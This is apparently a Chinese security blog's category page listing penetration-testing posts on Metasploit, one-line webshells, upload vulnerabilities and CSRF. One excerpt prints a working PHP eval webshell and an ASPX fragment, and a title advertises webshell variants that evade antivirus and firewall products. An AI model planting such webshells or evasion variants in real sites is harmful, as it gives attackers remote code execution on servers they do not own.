渗透
V
不乱于心,不困于情,不畏将来,不念过往
展开
-
Metasploit渗透测试笔记(一)
小结渗透测试时一种通过模拟恶意攻击者的技术与方法,挫败目的标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。渗透测试具有两种基本类型:黑盒测试与白盒测试,结合两种的称为灰盒测试。目前业界流行的渗透测试方法学有OSSTMM、NIST SP800-42、OWASP TOP 10、WASC-TC、PTES等。渗透测试主要包括前期交互、情报搜集、威胁建模、...原创 2019-10-23 15:44:47 · 401 阅读 · 0 评论 -
一句话木马原理与实战
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战介绍一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。常用一句话木马php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language=“Jscript”%> <%eval(Re...原创 2019-07-30 20:30:44 · 3399 阅读 · 0 评论 -
史上最全的一句话木马
史上最全一句话木马PHP普通一句话PHP系列过狗一句话PHP过狗几个变性的php--过防火墙phpv9 高版本拿shellASPasp 一句话ASP过安全狗一句话ASPX系列aspx一句话JSP过护卫神的插入一句话容易爆错一句话木马到两句话木马的转型!一句话免杀:一:变形法支持变异菜刀连接以过安全狗,过啊D 文件扫描的一句话ASPASPASPX大家伙 把你们手中好的发出来共享下吧 别藏着了PHP...原创 2019-07-30 21:34:08 · 13948 阅读 · 3 评论 -
史上最完整漏洞上传原理与实践
最近看的一些关于漏洞上传的知识,详细的记录加上自己的一些想法,做渗透最重要的是实践,自认为是非常详细了,大家可以做个随便看看,有问题可以留言,谢谢原创 2019-08-01 10:58:40 · 831 阅读 · 0 评论 -
CSRF(跨站请求伪造)原理与实践
CSRF原理与实践一、原理二、实践2.1 CSRF (get)与(post)2.2 CSRF结合XSS2.3 Token防止CSRF一、原理Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也称为"one click...原创 2019-08-05 22:11:29 · 500 阅读 · 0 评论